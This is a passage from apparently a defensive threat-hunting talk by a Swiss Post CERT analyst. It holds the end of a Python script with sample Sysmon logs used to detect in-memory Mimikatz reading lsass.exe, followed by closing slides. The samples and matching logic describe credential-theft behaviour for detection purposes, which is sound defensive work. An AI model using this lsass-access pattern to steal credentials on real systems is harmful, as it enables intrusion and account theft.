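TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1000
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a5a4|C:\Windows\system32\KERNELBASE.dll+f61|C:\Windows\system32\taskmgr.exe+1f2e""",
    # Matching mask and trace, but the target is not lsass.exe
    r"""Process accessed:
SourceImage: C:\Windows\SysWOW64\rundll32.exe
TargetImage: C:\Windows\system32\svchost.exe
GrantedAccess: 0x1410
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a5a4|C:\Windows\system32\KERNELBASE.dll+f61|UNKNOWN(0000000002C70B4C)""",
]

if __name__ == "__main__":
    for source, access, fileless in hunt(SAMPLES):
        print(f"{source}  GrantedAccess={access}  file-less={fileless}")
```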

Detecting Mimikatz (OpenProcess)



I have some questions…

• Please stand up…
• Sit down if you…
  • didn't learn anything new (resources, examples)
  • detect internal C&C using Named Pipes over SMB
  • detect in-memory / file-less Mimikatz on (all of) your hosts
    • Bonus: all versions of Mimikatz?
• Everyone sitting now I would like to have a chat


Do you have questions?

• Is there time left for Q&A?


Thank you for your attention!

Tom Ueltschi, Swiss Post CERT
